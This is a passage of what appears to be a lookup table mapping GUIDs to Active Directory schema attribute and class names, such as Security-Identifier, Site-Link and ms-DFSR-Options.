"15585999-fd49-4d66-b25d-eeb96aba8174": "ms-DS-Never-Reveal-Group",
"422144fa-c17f-4649-94d6-9731ed2784ed": "MSMQ-Site-Name-Ex",
"bf967a2f-0de6-11d0-a285-00aa003049e2": "Security-Identifier",
"1075b3a1-bbaf-49d2-ae8d-c4f25c823303": "ms-SPP-Issuance-License",
"b40ff828-427a-11d1-a9c2-0000f80367c1": "Ipsec-ISAKMP-Policy",
"bf967ab3-0de6-11d0-a285-00aa003049e2": "Site",
"bf967919-0de6-11d0-a285-00aa003049e2": "Admin-Description",
"b40ff820-427a-11d1-a9c2-0000f80367c1": "Ipsec-ISAKMP-Reference",
"303d9f4a-1dd6-4b38-8fc5-33afe8c988ad": "ms-DS-Reveal-OnDemand-Group",
"9a0dc32a-c100-11d1-bbc5-0080c76670c0": "MSMQ-Sites",
"bf967a31-0de6-11d0-a285-00aa003049e2": "See-Also",
"19d706eb-4d76-44a2-85d6-1c342be3be37": "ms-TPM-Srk-Pub-Thumbprint",
"bf96791a-0de6-11d0-a285-00aa003049e2": "Admin-Display-Name",
"b40ff81c-427a-11d1-a9c2-0000f80367c1": "Ipsec-Name",
"aa156612-2396-467e-ad6a-28d23fdb1865": "ms-DS-Secondary-KrbTgt-Number",
"9a0dc329-c100-11d1-bbc5-0080c76670c0": "MSMQ-Transactional",
"ddac0cf2-af8f-11d0-afeb-00c04fd930c9": "Seq-Notification",
"c894809d-b513-4ff8-8811-f4f43f5ac7bc": "ms-TPM-Owner-Information-Temp",
"b40ff827-427a-11d1-a9c2-0000f80367c1": "Ipsec-Negotiation-Policy",
"d50c2cde-8951-11d1-aebc-0000f80367c1": "Site-Link",
"18f9b67d-5ac6-4b3b-97db-d0a406afb7ba": "Admin-Multiselect-Property-Pages",
"07383075-91df-11d1-aebc-0000f80367c1": "IPSEC-Negotiation-Policy-Action",
"94f6f2ac-c76d-4b5e-b71f-f332c3e93c22": "ms-DS-Revealed-DSAs",
"c58aae32-56f9-11d2-90d0-00c04fd91ab1": "MSMQ-User-Sid",
"bf967a32-0de6-11d0-a285-00aa003049e2": "Serial-Number",
"ea1b7b93-5e48-46d5-bc6c-4df4fda78a35": "ms-TPM-Tpm-Information-For-Computer",
"52458038-ca6a-11d0-afff-0000f80367c1": "Admin-Property-Pages",
"b40ff822-427a-11d1-a9c2-0000f80367c1": "Ipsec-Negotiation-Policy-Reference",
"5dd68c41-bfdf-438b-9b5d-39d9618bf260": "ms-DS-KrbTgt-Link-BL",
"9a0dc336-c100-11d1-bbc5-0080c76670c0": "MSMQ-Version",
"09dcb7a0-165f-11d0-a064-00aa006c33ed": "Server-Name",
"14fa84c9-8ecd-4348-bc91-6d3ced472ab7": "ms-TPM-Tpm-Information-For-Computer-BL",
"b40ff829-427a-11d1-a9c2-0000f80367c1": "Ipsec-NFA",
"d50c2cdf-8951-11d1-aebc-0000f80367c1": "Site-Link-Bridge",
"9a7ad940-ca53-11d1-bbd0-0080c76670c0": "Allowed-Attributes",
"07383074-91df-11d1-aebc-0000f80367c1": "IPSEC-Negotiation-Policy-Type",
"c8bc72e0-a6b4-48f0-94a5-fd76a88c9987": "ms-DS-Is-Full-Replica-For",
"db0c9085-c1f2-11d1-bbc5-0080c76670c0": "msNPAllowDialin",
"26d9736d-6070-11d1-a9c6-0000f80367c1": "Server-Reference",
"0be0dd3b-041a-418c-ace9-2f17d23e9d42": "ms-DNS-Keymaster-Zones",
"9a7ad941-ca53-11d1-bbd0-0080c76670c0": "Allowed-Attributes-Effective",
"b40ff821-427a-11d1-a9c2-0000f80367c1": "Ipsec-NFA-Reference",
"ff155a2a-44e5-4de0-8318-13a58988de4f": "ms-DS-Is-Domain-For",
"db0c9089-c1f2-11d1-bbc5-0080c76670c0": "msNPCalledStationID",
"26d9736e-6070-11d1-a9c6-0000f80367c1": "Server-Reference-BL",
"aa12854c-d8fc-4d5e-91ca-368b8d829bee": "ms-DNS-Is-Signed",
"b7b13121-b82e-11d0-afee-0000f80367c1": "Ipsec-Policy",
"7a4117da-cd67-11d0-afff-0000f80367c1": "Sites-Container",
"9a7ad942-ca53-11d1-bbd0-0080c76670c0": "Allowed-Child-Classes",
"b40ff824-427a-11d1-a9c2-0000f80367c1": "Ipsec-Owners-Reference",
"37c94ff6-c6d4-498f-b2f9-c6f7f8647809": "ms-DS-Is-Partial-Replica-For",
"db0c908a-c1f2-11d1-bbc5-0080c76670c0": "msNPCallingStationID",
"bf967a33-0de6-11d0-a285-00aa003049e2": "Server-Role",
"c79f2199-6da1-46ff-923c-1f3f800c721e": "ms-DNS-Sign-With-NSEC3",
"9a7ad943-ca53-11d1-bbd0-0080c76670c0": "Allowed-Child-Classes-Effective",
"b7b13118-b82e-11d0-afee-0000f80367c1": "Ipsec-Policy-Reference",
"fe01245a-341f-4556-951f-48c033a89050": "ms-DS-Is-User-Cachable-At-Rodc",
"db0c908e-c1f2-11d1-bbc5-0080c76670c0": "msNPSavedCallingStationID",
"bf967a34-0de6-11d0-a285-00aa003049e2": "Server-State",
"7bea2088-8ce2-423c-b191-66ec506b1595": "ms-DNS-NSEC3-OptOut",
"bf967a9e-0de6-11d0-a285-00aa003049e2": "Leaf",
"bf967ab5-0de6-11d0-a285-00aa003049e2": "Storage",
"00fbf30c-91fe-11d1-aebc-0000f80367c1": "Alt-Security-Identities",
"00fbf30d-91fe-11d1-aebc-0000f80367c1": "Is-Critical-System-Object",
"cbdad11c-7fec-387b-6219-3a0627d9af81": "ms-DS-Revealed-List",
"db0c909c-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSCallbackNumber",
"b7b1311c-b82e-11d0-afee-0000f80367c1": "Service-Binding-Information",
"0dc063c1-52d9-4456-9e15-9c2434aafd94": "ms-DNS-Maintain-Trust-Anchor",
"45b01500-c419-11d1-bbc9-0080c76670c0": "ANR",
"28630ebe-41d5-11d1-a9c1-0000f80367c1": "Is-Defunct",
"aa1c88fd-b0f6-429f-b2ca-9d902266e808": "ms-DS-Revealed-List-BL",
"db0c90a4-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSFramedIPAddress",
"bf967a35-0de6-11d0-a285-00aa003049e2": "Service-Class-ID",
"5c5b7ad2-20fa-44bb-beb3-34b9c0f65579": "ms-DNS-DS-Record-Algorithms",
"1be8f17d-a9ff-11d0-afe2-00c04fd930c9": "Licensing-Site-Settings",
"b7b13124-b82e-11d0-afee-0000f80367c1": "Subnet",
"96a7dd65-9118-11d1-aebc-0000f80367c1": "App-Schema-Version",
"bf96798f-0de6-11d0-a285-00aa003049e2": "Is-Deleted",
"011929e6-8b5d-4258-b64a-00b0b4949747": "ms-DS-Last-Successful-Interactive-Logon-Time",
"db0c90a9-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSFramedRoute",
"bf967a36-0de6-11d0-a285-00aa003049e2": "Service-Class-Info",
"27d93c40-065a-43c0-bdd8-cdf2c7d120aa": "ms-DNS-RFC5011-Key-Rollovers",
"dd712226-10e4-11d0-a05f-00aa006c33ed": "Application-Name",
"f4c453f0-c5f1-11d1-bbcb-0080c76670c0": "Is-Ephemeral",
"c7e7dafa-10c3-4b8b-9acd-54f11063742e": "ms-DS-Last-Failed-Interactive-Logon-Time",
"db0c90b6-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSServiceType",
"b7b1311d-b82e-11d0-afee-0000f80367c1": "Service-Class-Name",
"ff9e5552-7db7-4138-8888-05ce320a0323": "ms-DNS-NSEC3-Hash-Algorithm",
"ddac0cf5-af8f-11d0-afeb-00c04fd930c9": "Link-Track-Object-Move-Table",
"b7b13125-b82e-11d0-afee-0000f80367c1": "Subnet-Container",
"8297931d-86d3-11d0-afda-00c04fd930c9": "Applies-To",
"bf967991-0de6-11d0-a285-00aa003049e2": "Is-Member-Of-DL",
"dc3ca86f-70ad-4960-8425-a4d6313d93dd": "ms-DS-Failed-Interactive-Logon-Count",
"db0c90c5-c1f2-11d1-bbc5-0080c76670c0": "msRASSavedCallbackNumber",
"28630eb8-41d5-11d1-a9c1-0000f80367c1": "Service-DNS-Name",
"13361665-916c-4de7-a59d-b1ebbd0de129": "ms-DNS-NSEC3-Random-Salt-Length",
"ba305f75-47e3-11d0-a1a6-00c04fd930c9": "Asset-Number",
"19405b9d-3cfa-11d1-a9c0-0000f80367c1": "Is-Member-Of-Partial-Attribute-Set",
"c5d234e5-644a-4403-a665-e26e0aef5e98": "ms-DS-Failed-Interactive-Logon-Count-At-Last-Successful-Logon",
"db0c90c6-c1f2-11d1-bbc5-0080c76670c0": "msRASSavedFramedIPAddress",
"28630eba-41d5-11d1-a9c1-0000f80367c1": "Service-DNS-Name-Type",
"80b70aab-8959-4ec0-8e93-126e76df3aca": "ms-DNS-NSEC3-Iterations",
"ddac0cf7-af8f-11d0-afeb-00c04fd930c9": "Link-Track-OMT-Entry",
"0296c11c-40da-11d1-a9c0-0000f80367c1": "Assistant",
"19405b9c-3cfa-11d1-a9c0-0000f80367c1": "Is-Privilege-Holder",
"31f7b8b6-c9f8-4f2d-a37b-58a823030331": "ms-DS-USN-Last-Sync-Success",
"db0c90c7-c1f2-11d1-bbc5-0080c76670c0": "msRASSavedFramedRoute",
"bf967a37-0de6-11d0-a285-00aa003049e2": "Service-Instance-Version",
"8f4e317f-28d7-442c-a6df-1f491f97b326": "ms-DNS-DNSKEY-Record-Set-TTL",
"bf967ab8-0de6-11d0-a285-00aa003049e2": "Trusted-Domain",
"398f63c0-ca60-11d1-bbd1-0000f81f10c0": "Assoc-NT-Account",
"8fb59256-55f1-444b-aacb-f5b482fe3459": "Is-Recycled",
"78fc5d84-c1dc-3148-8984-58f792d41d3e": "ms-DS-Value-Type-Reference",
"bf9679d3-0de6-11d0-a285-00aa003049e2": "Must-Contain",
"f3a64788-5306-11d1-a9c5-0000f80367c1": "Service-Principal-Name",
"29869b7c-64c4-42fe-97d5-fbc2fa124160": "ms-DNS-DS-Record-Set-TTL",
"ddac0cf6-af8f-11d0-afeb-00c04fd930c9": "Link-Track-Vol-Entry",
"3320fc38-c379-4c17-a510-1bdf6133c5da": "associatedDomain",
"bf967992-0de6-11d0-a285-00aa003049e2": "Is-Single-Valued",
"ab5543ad-23a1-3b45-b937-9b313d5474a8": "ms-DS-Value-Type-Reference-BL",
"80212840-4bdc-11d1-a9c4-0000f80367c1": "Name-Service-Flags",
"7d6c0e97-7e20-11d0-afd6-00c04fd930c9": "Setup-Command",
"03d4c32e-e217-4a61-9699-7bbc4729a026": "ms-DNS-Signature-Inception-Offset",
"281416e2-1968-11d0-a28f-00aa003049e2": "Type-Library",
"f7fbfc45-85ab-42a4-a435-780e62f7858b": "associatedName",
"bac80572-09c4-4fa9-9ae6-7628d7adbe0e": "jpegPhoto",
"8a0560c1-97b9-4811-9db7-dc061598965b": "ms-DS-Optional-Feature-Flags",
"bf9679d6-0de6-11d0-a285-00aa003049e2": "NC-Name",
"553fd039-f32e-11d0-b0bc-00c04fd8dca6": "Shell-Context-Menu",
"f6b0f0be-a8e4-4468-8fd9-c3c47b8722f9": "ms-DNS-Secure-Delegation-Polling-Period",
"ddac0cf4-af8f-11d0-afeb-00c04fd930c9": "Link-Track-Volume-Table",
"fa4693bb-7bc2-4cb9-81a8-c99c43b7905e": "attributeCertificateAttribute",
"bf967993-0de6-11d0-a285-00aa003049e2": "Keywords",
"bf9679d8-0de6-11d0-a285-00aa003049e2": "NETBIOS-Name",
"52458039-ca6a-11d0-afff-0000f80367c1": "Shell-Property-Pages",
"3443d8cd-e5b6-4f3b-b098-659a0214a079": "ms-DNS-Signing-Key-Descriptors",
"bf967abb-0de6-11d0-a285-00aa003049e2": "Volume",
"cb843f80-48d9-11d1-a9c3-0000f80367c1": "Attribute-Display-Names",
"1677581f-47f3-11d1-a9c3-0000f80367c1": "Knowledge-Information",
"07383076-91df-11d1-aebc-0000f80367c1": "netboot-Allow-New-Clients",
"45b01501-c419-11d1-bbc9-0080c76670c0": "Short-Server-Name",
"b7673e6d-cad9-4e9e-b31a-63e8098fdd63": "ms-DNS-Signing-Keys",
"bf967aa0-0de6-11d0-a285-00aa003049e2": "Locality",
"bf967922-0de6-11d0-a285-00aa003049e2": "Attribute-ID",
"c569bb46-c680-44bc-a273-e6c227d71b45": "labeledURI",
"0738307b-91df-11d1-aebc-0000f80367c1": "netboot-Answer-Only-Valid-Clients",
"3e74f60e-3e73-11d1-a9c0-0000f80367c1": "Show-In-Address-Book",
"28c458f5-602d-4ac9-a77c-b3f1be503a7e": "ms-DNS-DNSKEY-Records",
"ad44bb41-67d5-4d88-b575-7b20674e76d8": "PosixAccount",
"bf967924-0de6-11d0-a285-00aa003049e2": "Attribute-Security-GUID",
"1fbb0be8-ba63-11d0-afef-0000f80367c1": "Last-Backup-Restoration-Time",
"0738307a-91df-11d1-aebc-0000f80367c1": "netboot-Answer-Requests",
"bf967984-0de6-11d0-a285-00aa003049e2": "Show-In-Advanced-View-Only",
"285c6964-c11a-499e-96d8-bf7c75a223c6": "ms-DNS-Parent-Has-Secure-Delegation",
"52ab8671-5709-11d1-a9c6-0000f80367c1": "Lost-And-Found",
"bf967925-0de6-11d0-a285-00aa003049e2": "Attribute-Syntax",
"bf967995-0de6-11d0-a285-00aa003049e2": "Last-Content-Indexed",
"5643ff81-35b6-4ca9-9512-baf0bd0a2772": "ms-FRS-Hub-Member",
"07383079-91df-11d1-aebc-0000f80367c1": "netboot-Current-Client-Count",
"17eb4278-d167-11d0-b002-0000f80367c1": "SID-History",
"ba340d47-2181-4ca0-a2f6-fae4479dab2a": "ms-DNS-Propagation-Time",
"5b6d8467-1a18-4174-b350-9cc6e7b4ac8d": "ShadowAccount",
"9a7ad944-ca53-11d1-bbd0-0080c76670c0": "Attribute-Types",
"52ab8670-5709-11d1-a9c6-0000f80367c1": "Last-Known-Parent",
"92aa27e0-5c50-402d-9ec1-ee847def9788": "ms-FRS-Topology-Pref",
"3e978921-8c01-11d0-afda-00c04fd930c9": "Netboot-GUID",
"2a39c5b2-8960-11d1-aebc-0000f80367c1": "Signature-Algorithms",
"aff16770-9622-4fbc-a128-3088777605b9": "ms-DNS-NSEC3-User-Salt",
"11b6cc94-48c4-11d1-a9c3-0000f80367c1": "Meeting",
"d0e1d224-e1a0-42ce-a2da-793ba5244f35": "audio",
"bf967996-0de6-11d0-a285-00aa003049e2": "Last-Logoff",
"1a861408-38c3-49ea-ba75-85481a77c655": "ms-DFSR-Version",
"532570bd-3d77-424f-822f-0d636dc6daad": "Netboot-DUID",
"3e978924-8c01-11d0-afda-00c04fd930c9": "Site-GUID",
"387d9432-a6d1-4474-82cd-0a89aae084ae": "ms-DNS-NSEC3-Current-Salt",
"2a9350b8-062c-4ed0-9903-dde10d06deba": "PosixGroup",
"6da8a4fe-0e52-11d0-a286-00aa003049e2": "Auditing-Policy",
"bf967997-0de6-11d0-a285-00aa003049e2": "Last-Logon",
"78f011ec-a766-4b19-adcf-7b81ed781a4d": "ms-DFSR-Extension",
"3e978920-8c01-11d0-afda-00c04fd930c9": "Netboot-Initialization",
"d50c2cdd-8951-11d1-aebc-0000f80367c1": "Site-Link-List",
"07831919-8f94-4fb6-8a42-91545dccdad3": "ms-Authz-Effective-Security-Policy",
"c9010e74-4e58-49f7-8a89-5e3e2340fcf8": "ms-COM-Partition",
"bf967928-0de6-11d0-a285-00aa003049e2": "Authentication-Options",
"c0e20a04-0e5a-4ff3-9482-5efeaecd7060": "Last-Logon-Timestamp",
"d7d5e8c1-e61f-464f-9fcf-20bbe0a2ec54": "ms-DFSR-RootPath",
"0738307e-91df-11d1-aebc-0000f80367c1": "netboot-IntelliMirror-OSes",
"d50c2cdc-8951-11d1-aebc-0000f80367c1": "Site-List",
"b946bece-09b5-4b6a-b25a-4b63a330e80e": "ms-Authz-Proposed-Security-Policy",
"2517fadf-fa97-48ad-9de6-79ac5721f864": "IpService",
"1677578d-47f3-11d1-a9c3-0000f80367c1": "Authority-Revocation-List",
"bf967998-0de6-11d0-a285-00aa003049e2": "Last-Set-Time",
"90b769ac-4413-43cf-ad7a-867142e740a3": "ms-DFSR-RootSizeInMb",
"07383077-91df-11d1-aebc-0000f80367c1": "netboot-Limit-Clients",
"3e10944c-c354-11d0-aff8-0000f80367c1": "Site-Object",
"8e1685c6-3e2f-48a2-a58d-5af0ea789fa0": "ms-Authz-Last-Effective-Security-Policy",
"250464ab-c417-497a-975a-9e0d459a7ca1": "ms-COM-PartitionSet",
"bf96792c-0de6-11d0-a285-00aa003049e2": "Auxiliary-Class",
"7d6c0e9c-7e20-11d0-afd6-00c04fd930c9": "Last-Update-Sequence",
"86b9a69e-f0a6-405d-99bb-77d977992c2a": "ms-DFSR-StagingPath",
"07383080-91df-11d1-aebc-0000f80367c1": "netboot-Locally-Installed-OSes",
"3e10944d-c354-11d0-aff8-0000f80367c1": "Site-Object-BL",
"80997877-f874-4c68-864d-6e508a83bdbd": "ms-Authz-Resource-Condition",
"9c2dcbd2-fbf0-4dc7-ace0-8356dcd0f013": "IpProtocol",
"bf96792d-0de6-11d0-a285-00aa003049e2": "Bad-Password-Time",
"7359a352-90f7-11d1-aebc-0000f80367c1": "LDAP-Admin-Limits",
"250a8f20-f6fc-4559-ae65-e4b24c67aebe": "ms-DFSR-StagingSizeInMb",
"3e978923-8c01-11d0-afda-00c04fd930c9": "Netboot-Machine-File-Path",
"1be8f17c-a9ff-11d0-afe2-00c04fd930c9": "Site-Server",
"62f29b60-be74-4630-9456-2f6691993a86": "ms-Authz-Central-Access-Policy-ID",
"90df3c3e-1854-4455-a5d7-cad40d56657a": "ms-DS-App-Configuration",
"bf96792e-0de6-11d0-a285-00aa003049e2": "Bad-Pwd-Count",
"bf96799a-0de6-11d0-a285-00aa003049e2": "LDAP-Display-Name",
"5cf0bcc8-60f7-4bff-bda6-aea0344eb151": "ms-DFSR-ConflictPath",
"07383078-91df-11d1-aebc-0000f80367c1": "netboot-Max-Clients",
"26d9736f-6070-11d1-a9c6-0000f80367c1": "SMTP-Mail-Address",
"57f22f7a-377e-42c3-9872-cec6f21d2e3e": "ms-Authz-Member-Rules-In-Central-Access-Policy",
"cadd1e5e-fefc-4f3f-b5a9-70e994204303": "OncRpc",
"1f0075f9-7e40-11d0-afd6-00c04fd930c9": "Birth-Location",
"7359a353-90f7-11d1-aebc-0000f80367c1": "LDAP-IPDeny-List",
"9ad33fc9-aacf-4299-bb3e-d1fc6ea88e49": "ms-DFSR-ConflictSizeInMb",
"2df90d85-009f-11d2-aa4c-00c04fd7d83a": "Netboot-Mirror-Data-File",
"2ab0e76c-7041-11d2-9905-0000f87a57d4": "SPN-Mappings",
"516e67cf-fedd-4494-bb3a-bc506a948891": "ms-Authz-Member-Rules-In-Central-Access-Policy-BL",
"9e67d761-e327-4d55-bc95-682f875e2f8e": "ms-DS-App-Data",
"d50c2cdb-8951-11d1-aebc-0000f80367c1": "Bridgehead-Server-List-BL",
"03726ae7-8e7d-4446-8aae-a91657c00993": "ms-DFSR-Enabled",
"0738307c-91df-11d1-aebc-0000f80367c1": "netboot-New-Machine-Naming-Policy",
"bf967a39-0de6-11d0-a285-00aa003049e2": "State-Or-Province-Name",
"fa32f2a6-f28b-47d0-bf91-663e8f910a72": "ms-DS-Claim-Source",
"ab911646-8827-4f95-8780-5a8f008eb68f": "IpHost",
"d50c2cda-8951-11d1-aebc-0000f80367c1": "Bridgehead-Transport-List",
"bf96799b-0de6-11d0-a285-00aa003049e2": "Link-ID",
"eeed0fc8-1001-45ed-80cc-bbf744930720": "ms-DFSR-ReplicationGroupType",
"0738307d-91df-11d1-aebc-0000f80367c1": "netboot-New-Machine-OU",
"bf967a3a-0de6-11d0-a285-00aa003049e2": "Street-Address",
"92f19c05-8dfa-4222-bbd1-2c4f01487754": "ms-DS-Claim-Source-Type",
"cfee1051-5f28-4bae-a863-5d0cc18a8ed1": "ms-DS-Az-Admin-Manager",
"f87fa54b-b2c5-4fd7-88c0-daccb21d93c5": "buildingName",
"2ae80fe2-47b4-11d0-a1a4-00c04fd930c9": "Link-Track-Secret",
"23e35d4c-e324-4861-a22f-e199140dae00": "ms-DFSR-TombstoneExpiryInMin",
"07383082-91df-11d1-aebc-0000f80367c1": "netboot-SCP-BL",
"3860949f-f6a8-4b38-9950-81ecb6bc2982": "Structural-Object-Class",
"0c2ce4c7-f1c3-4482-8578-c60d4bb74422": "ms-DS-Claim-Is-Value-Space-Restricted",
"d95836c3-143e-43fb-992a-b057f1ecadf9": "IpNetwork",
"bf96792f-0de6-11d0-a285-00aa003049e2": "Builtin-Creation-Time",
"bf96799d-0de6-11d0-a285-00aa003049e2": "Lm-Pwd-History",
"d68270ac-a5dc-4841-a6ac-cd68be38c181": "ms-DFSR-FileFilter",
"07383081-91df-11d1-aebc-0000f80367c1": "netboot-Server",
"bf967a3b-0de6-11d0-a285-00aa003049e2": "Sub-Class-Of",
"cd789fb9-96b4-4648-8219-ca378161af38": "ms-DS-Claim-Is-Single-Valued",
"ddf8de9b-cba5-4e12-842e-28d8b66f75ec": "ms-DS-Az-Application",
"bf967930-0de6-11d0-a285-00aa003049e2": "Builtin-Modified-Count",
"bf96799e-0de6-11d0-a285-00aa003049e2": "Local-Policy-Flags",
"93c7b477-1f2e-4b40-b7bf-007e8d038ccf": "ms-DFSR-DirectoryFilter",
"2df90d84-009f-11d2-aa4c-00c04fd7d83a": "Netboot-SIF-File",
"bf967a3c-0de6-11d0-a285-00aa003049e2": "Sub-Refs",
"1e5d393d-8cb7-4b4f-840a-973b36cc09c3": "ms-DS-Generation-Id",
"72efbf84-6e7b-4a5c-a8db-8a75a7cad254": "NisNetgroup",
"bf967931-0de6-11d0-a285-00aa003049e2": "Business-Category",
"80a67e4d-9f22-11d0-afdd-00c04fd930c9": "Local-Policy-Reference",
"4699f15f-a71f-48e2-9ff5-5897c0759205": "ms-DFSR-Schedule",
"0738307f-91df-11d1-aebc-0000f80367c1": "netboot-Tools",
"9a7ad94d-ca53-11d1-bbd0-0080c76670c0": "SubSchemaSubEntry",
"a13df4e2-dbb0-4ceb-828b-8b2e143e9e81": "ms-DS-Primary-Computer",
"860abe37-9a9b-4fa4-b3d2-b8ace5df9ec5": "ms-DS-Az-Operation",
"ba305f76-47e3-11d0-a1a6-00c04fd930c9": "Bytes-Per-Minute",
"bf9679a1-0de6-11d0-a285-00aa003049e2": "Locale-ID",
"048b4692-6227-4b67-a074-c4437083e14b": "ms-DFSR-Keywords",
"bf9679d9-0de6-11d0-a285-00aa003049e2": "Network-Address",
"963d274c-48be-11d1-a9c3-0000f80367c1": "Super-Scope-Description",
"998c06ac-3f87-444e-a5df-11b03dc8a50c": "ms-DS-Is-Primary-Computer-For",
"7672666c-02c1-4f33-9ecf-f649c1dd9b7c": "NisMap",
"bf967932-0de6-11d0-a285-00aa003049e2": "CA-Certificate",
"bf9679a2-0de6-11d0-a285-00aa003049e2": "Locality-Name",
"fe515695-3f61-45c8-9bfa-19c148c57b09": "ms-DFSR-Flags",
"bf9679da-0de6-11d0-a285-00aa003049e2": "Next-Level-Store",
"963d274b-48be-11d1-a9c3-0000f80367c1": "Super-Scopes",
"db2c48b2-d14d-ec4e-9f58-ad579d8b440e": "ms-Kds-KDF-AlgorithmID",
"8213eac9-9d55-44dc-925c-e9a52b927644": "ms-DS-Az-Role",
"963d2740-48be-11d1-a9c3-0000f80367c1": "CA-Certificate-DN",
"d9e18316-8939-11d1-aebc-0000f80367c1": "Localized-Description",
"d6d67084-c720-417d-8647-b696237a114c": "ms-DFSR-Options",
"bf9679db-0de6-11d0-a285-00aa003049e2": "Next-Rid",
"5245801d-ca6a-11d0-afff-0000f80367c1": "Superior-DNS-Root",
"8a800772-f4b8-154f-b41c-2e4271eff7a7": "ms-Kds-KDF-Param",
"904f8a93-4954-4c5f-b1e1-53c097a31e13": "NisObject",
"963d2735-48be-11d1-a9c3-0000f80367c1": "CA-Connect",
"a746f0d1-78d0-11d2-9916-0000f87a57d4": "Localization-Display-Id",
"1035a8e1-67a8-4c21-b7bb-031cdf99d7a0": "ms-DFSR-ContentSetGuid",
"52458018-ca6a-11d0-afff-0000f80367c1": "Non-Security-Member",
"bf967a3f-0de6-11d0-a285-00aa003049e2": "Supplemental-Credentials",
"1702975d-225e-cb4a-b15d-0daea8b5e990": "ms-Kds-SecretAgreement-AlgorithmID",
"4feae054-ce55-47bb-860e-5b12063a51de": "ms-DS-Az-Scope",
"963d2738-48be-11d1-a9c3-0000f80367c1": "CA-Usages",
"09dcb79f-165f-11d0-a064-00aa006c33ed": "Location",
"e3b44e05-f4a7-4078-a730-f48670a743f8": "ms-DFSR-RdcEnabled",
"52458019-ca6a-11d0-afff-0000f80367c1": "Non-Security-Member-BL",
"1677588f-47f3-11d1-a9c3-0000f80367c1": "Supported-Application-Context",
"30b099d9-edfe-7549-b807-eba444da79e9": "ms-Kds-SecretAgreement-Param",
"a699e529-a637-4b7d-a0fb-5dc466a0b8a7": "IEEE802Device",
"963d2736-48be-11d1-a9c3-0000f80367c1": "CA-WEB-URL",
"bf9679a4-0de6-11d0-a285-00aa003049e2": "Lock-Out-Observation-Window",
"f402a330-ace5-4dc1-8cc9-74d900bf8ae0": "ms-DFSR-RdcMinFileSizeInKb",
"19195a56-6da0-11d0-afd3-00c04fd930c9": "Notification-List",
"bf967a41-0de6-11d0-a285-00aa003049e2": "Surname",
"e338f470-39cd-4549-ab5b-f69f9e583fe0": "ms-Kds-PublicKey-Length",
"1ed3a473-9b1b-418a-bfa0-3a37b95a5306": "ms-DS-Az-Task",
"d9e18314-8939-11d1-aebc-0000f80367c1": "Can-Upgrade-Script",
"bf9679a5-0de6-11d0-a285-00aa003049e2": "Lockout-Duration",
"2cc903e2-398c-443b-ac86-ff6b01eac7ba": "ms-DFSR-DfsPath",
"bf9679df-0de6-11d0-a285-00aa003049e2": "NT-Group-Members",
"037651e4-441d-11d1-a9c3-0000f80367c1": "Sync-Attributes",
"615f42a1-37e7-1148-a0dd-3007e09cfc81": "ms-Kds-PrivateKey-Length",
"4bcb2477-4bb3-4545-a9fc-fb66e136b435": "BootableDevice",
"9a7ad945-ca53-11d1-bbd0-0080c76670c0": "Canonical-Name",
"bf9679a6-0de6-11d0-a285-00aa003049e2": "Lockout-Threshold",
"51928e94-2cd8-4abe-b552-e50412444370": "ms-DFSR-RootFence",
"3e97891f-8c01-11d0-afda-00c04fd930c9": "NT-Mixed-Domain",
"037651e3-441d-11d1-a9c3-0000f80367c1": "Sync-Membership",
"26627c27-08a2-0a40-a1b1-8dce85b42993": "ms-Kds-RootKeyData",
"44f00041-35af-468b-b20a-6ce8737c580b": "ms-DS-Optional-Feature",
"d4159c92-957d-4a87-8a67-8d2934e01649": "carLicense",
"28630ebf-41d5-11d1-a9c1-0000f80367c1": "Lockout-Time",
"2dad8796-7619-4ff8-966e-0a5cc67b287f": "ms-DFSR-ReplicationGroupGuid",
"bf9679e2-0de6-11d0-a285-00aa003049e2": "Nt-Pwd-History",
"037651e2-441d-11d1-a9c3-0000f80367c1": "Sync-With-Object",
"d5f07340-e6b0-1e4a-97be-0d3318bd9db1": "ms-Kds-Version",
"d6710785-86ff-44b7-85b5-f1f8689522ce": "msSFU-30-Mail-Aliases",
"7bfdcb81-4807-11d1-a9c3-0000f80367c1": "Catalogs",
"bf9679a9-0de6-11d0-a285-00aa003049e2": "Logo",
"f7b85ba9-3bf9-428f-aab4-2eee6d56f063": "ms-DFSR-DfsLinkTarget",
"bf9679e3-0de6-11d0-a285-00aa003049e2": "NT-Security-Descriptor",
"037651e5-441d-11d1-a9c3-0000f80367c1": "Sync-With-SID",
"96400482-cf07-e94c-90e8-f2efc4f0495e": "ms-Kds-DomainID",
"3bcd9db8-f84b-451c-952f-6c52b81f9ec6": "ms-DS-Password-Settings",
"7bfdcb7e-4807-11d1-a9c3-0000f80367c1": "Categories",
"bf9679aa-0de6-11d0-a285-00aa003049e2": "Logon-Count",
"261337aa-f1c3-44b2-bbea-c88d49e6f0c7": "ms-DFSR-MemberReference",
"bf9679e4-0de6-11d0-a285-00aa003049e2": "Obj-Dist-Name",
"bf967a43-0de6-11d0-a285-00aa003049e2": "System-Auxiliary-Class",
"6cdc047f-f522-b74a-9a9c-d95ac8cdfda2": "ms-Kds-UseStartTime",
"e263192c-2a02-48df-9792-94f2328781a0": "msSFU-30-Net-Id",
"7d6c0e94-7e20-11d0-afd6-00c04fd930c9": "Category-Id",
"bf9679ab-0de6-11d0-a285-00aa003049e2": "Logon-Hours",
"6c7b5785-3d21-41bf-8a8a-627941544d5a": "ms-DFSR-ComputerReference",
"26d97369-6070-11d1-a9c6-0000f80367c1": "Object-Category",
"e0fa1e62-9b45-11d0-afdd-00c04fd930c9": "System-Flags",
"ae18119f-6390-0045-b32d-97dbc701aef7": "ms-Kds-CreateTime",
"5b06b06a-4cf3-44c0-bd16-43bc10a987da": "ms-DS-Password-Settings-Container",
"963d2732-48be-11d1-a9c3-0000f80367c1": "Certificate-Authority-Object",
"bf9679ac-0de6-11d0-a285-00aa003049e2": "Logon-Workstation",
"adde62c6-1880-41ed-bd3c-30b7d25e14f0": "ms-DFSR-MemberReferenceBL",
"bf9679e5-0de6-11d0-a285-00aa003049e2": "Object-Class",
"bf967a44-0de6-11d0-a285-00aa003049e2": "System-May-Contain",
"9cdfdbc5-0304-4569-95f6-c4f663fe5ae6": "ms-Imaging-Thumbprint-Hash",
"36297dce-656b-4423-ab65-dabb2770819e": "msSFU-30-Domain-Info",
"1677579f-47f3-11d1-a9c3-0000f80367c1": "Certificate-Revocation-List",
"bf9679ad-0de6-11d0-a285-00aa003049e2": "LSA-Creation-Time",
"5eb526d7-d71b-44ae-8cc6-95460052e6ac": "ms-DFSR-ComputerReferenceBL",
"bf9679e6-0de6-11d0-a285-00aa003049e2": "Object-Class-Category",
